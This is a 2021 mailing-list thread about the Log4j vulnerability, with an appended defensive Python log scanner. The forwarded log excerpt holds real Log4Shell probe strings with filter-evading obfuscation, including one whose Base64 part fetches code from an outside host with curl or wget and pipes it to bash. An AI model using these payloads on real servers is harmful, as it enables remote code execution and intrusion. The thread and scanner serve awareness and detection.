From: David Lang
To: Dave Taht
Cc: bloat
Date: Mon, 13 Dec 2021 11:42:16 -0800 (PST)
Subject: Re: [Bloat] Fwd: Log4j mitigation
Message-ID: <611o1o7-43r1-2q78-n69o-2ps7opq2rp8@ynat.uz>
References: <9c4dc5e1-b35d-6a62-a8fc-cac729f585d1@foobar.org> <002401d7f00f$c4fa1b60$4eee5220$@ddostest.me> <41BB6B27-4870-49F2-BD83-354692A01081@ip-clear.de> <002901d7f012$24093620$6c1ba260$@ddostest.me> <003a01d7f014$fd8c6e10$f8a54a30$@ddostest.me> <12CBBEBF-6B38-4924-AA86-E5E94D77513E@ip-clear.de>

Just a note that this doesn't require the code to be written in Java; any
language that runs in a JVM can end up having grief.

David Lang

On Mon, 13 Dec 2021, Dave Taht wrote:

> Date: Mon, 13 Dec 2021 05:56:36 -0800
> From: Dave Taht
> To: bloat
> Subject: [Bloat] Fwd: Log4j mitigation
>
> For those of you losing sleep over the Java logging exploit, my heart
> goes out to you.
>
> While I'm glad I, personally, and on the bufferbloat-related websites,
> haven't got a single thing written in Java, and I lost 3 weeks of my
> life over Christmas to Spectre, and several weeks per year - and
> usually, right around Christmas! - coping with other CVEs.... this one
> seems so big and affecting so many other services I use, that I just
> kind of want to take all my cash out of the bank, and log out, and
> find a tropic island somewhere.
>
> ---------- Forwarded message ---------
> From: Jörg Kost
> Date: Mon, Dec 13, 2021 at 3:43 AM
> Subject: Re: Log4j mitigation
> To: Jean St-Laurent
> Cc:
>
>
> You can't see it. The attack vector can hide in HTTP GETs, POSTs (SSL),
> in headers, in anything related to where a Java process does logging
> with Log4j; it's innumerable. It might even evaluate from a URI itself;
> it won't use a fixed port. It's not wormy right now, but maybe it will
> soon.
>
> We have been seeing things like this since the 10th of Dec. And this is
> only a typical Apache log file for HTTP/HTTPS, where we do logging:
>
> ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
> GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281
> "${jndi:dns://45.83.64.1/securityscan-http80}"
> "${jndi:dns://45.83.64.1/securityscan-http80}
> GET
> /?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
> HTTP/1.1" 200 -
> "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}"
> "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}
>
>
>
> --
> I tried to build a better future, a few times:
> https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org
>
> Dave Täht CEO, TekLibre, LLC
>
> _______________________________________________
> Bloat mailing list
> Bloat@lists.bufferbloat.net
> https://lists.bufferbloat.net/listinfo/bloat
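The log excerpt forwarded above shows why a plain grep for "jndi" misses much of the traffic: the probes URL-encode the braces, spell "ldap" out of `${lower:x}` lookups, and build "jndi" itself from `${::-j}` default-value lookups. Below is a defender-side log scanner, added here as an illustration and not code from anyone in the thread, that normalizes those tricks before matching. It collapses the `${lower:...}` and `${::-x}` forms seen in the excerpt, plus the `${upper:...}` form the thread does not show (an assumption: Log4j's other case-changing lookup), decodes URL-encoded braces, and then flags any line whose normalized text contains `${jndi:`. The Apache log lines it scans are constructed, using documentation addresses from 192.0.2.0/24 and a placeholder hostname, modelled on the patterns in the forwarded mail.

```python
import re
from urllib.parse import unquote

# Each pattern matches an innermost lookup only ([^{}]* forbids nested braces),
# so repeated substitution resolves nested lookups from the inside out, the way
# Log4j's own string substitution does.
_LOWER = re.compile(r"\$\{lower:([^{}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^{}]*)\}", re.IGNORECASE)
# Default-value form "${key:-default}" yields "default" when key is unknown;
# "${::-j}" from the thread is the degenerate case with an empty key.
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")


def normalize_lookups(text: str, max_rounds: int = 50) -> str:
    """Undo URL-encoding and collapse the lookup tricks used to hide 'jndi'."""
    # Probes often URL-encode the braces (%7B / %7D); decode until stable so a
    # double-encoded request is handled as well.
    for _ in range(5):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    # Resolve innermost lookups repeatedly until nothing changes.
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def classify(line: str) -> str:
    """'jndi' for a JNDI lookup, 'lookup' for any other ${...} lookup, else 'clean'."""
    norm = normalize_lookups(line).lower()
    if "${jndi:" in norm:
        return "jndi"
    if "${" in norm:
        return "lookup"
    return "clean"


def scan(lines):
    """Return (verdict, normalized line) for every line that is not clean."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict != "clean":
            hits.append((verdict, normalize_lookups(line)))
    return hits


# Constructed sample log (not the thread's own lines): documentation addresses
# and a placeholder hostname, with the obfuscation patterns from the excerpt.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [13/Dec/2021:10:00:02 +0000] "GET /$%7Bjndi:dns://192.0.2.50/securityscan-http80%7D HTTP/1.1" 301 281 "-" "-"',
    '192.0.2.12 - - [13/Dec/2021:10:00:03 +0000] "GET /?x=${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://192.0.2.51:12344/Basic/Command} HTTP/1.1" 200 - "-" "-"',
    '192.0.2.13 - - [13/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 - "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.example.invalid}"',
    '192.0.2.14 - - [13/Dec/2021:10:00:05 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 - "-" "-"',
]

if __name__ == "__main__":
    for verdict, norm in scan(SAMPLE_LOG):
        print(f"{verdict:7s} {norm}")
```

Matching on the normalized text rather than the raw line is the whole point: the fourth sample line contains neither "jndi" nor "ldap" as written, yet normalizes to `${jndi:ldap://${hostName}.example.invalid}`. Any remaining `${...}` in request data is worth a look too, which is why the scanner reports a separate "lookup" verdict instead of discarding those lines.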